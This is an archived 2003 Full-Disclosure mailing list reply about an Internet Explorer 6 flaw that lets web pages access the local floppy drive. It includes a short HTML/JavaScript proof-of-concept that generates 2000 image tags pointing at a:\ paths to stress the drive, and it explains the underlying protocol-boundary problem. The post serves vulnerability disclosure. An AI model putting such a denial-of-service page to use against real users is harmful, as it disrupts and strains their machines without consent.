[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] RE: IE6 & Java 1.4.2_02 applet: Hardware stress on floppy drive
- To: <full-disclosure@lists.netsys.com>, "'Marc Schoenefeld'" <schonef@uni-muenster.de>
- Subject: [Full-Disclosure] RE: IE6 & Java 1.4.2_02 applet: Hardware stress on floppy drive
- From: "Richard M. Smith" <rms@computerbytesman.com>
- Date: Tue, 21 Oct 2003 18:53:08 -0400
Here's a more general approach to using the floppy drive for a DoS attack on
a Windows machine:
<html>
<head>
</head>
<body>
<script>
for(i = 1; i <= 2000; ++i)
{
document.writeln("<img src=a:\\foo" + i + ".gif width=1 height=1>");
}
</script>
</body>
</html>
The fundamental problem here is that a Web page using the http: protocol
shouldn't be able to access HTML objects from a local system using the file:
protocol.
This same trick can be also used from an HTML email message, but the <img>
tags will have to hardwired into the HTML message and not generated by
script code.
Richard
-----Original Message-----
From: Marc Schoenefeld [mailto:schonef@uni-muenster.de]
Sent: Tuesday, October 21, 2003 5:00 PM
To: bugtraq@securityfocus.com; full-disclosure@lists.netsys.com
Subject: IE6 & Java 1.4.2_02 applet: Hardware stress on floppy drive
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi,
be prepared that your IE6 will be blocked if you
run the java plugin (any 1.4.x including 1.4.2_02)
with the following applet:
http://www.illegalaccess.org/exploits/java/applet/MyFloppySucks.html
...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html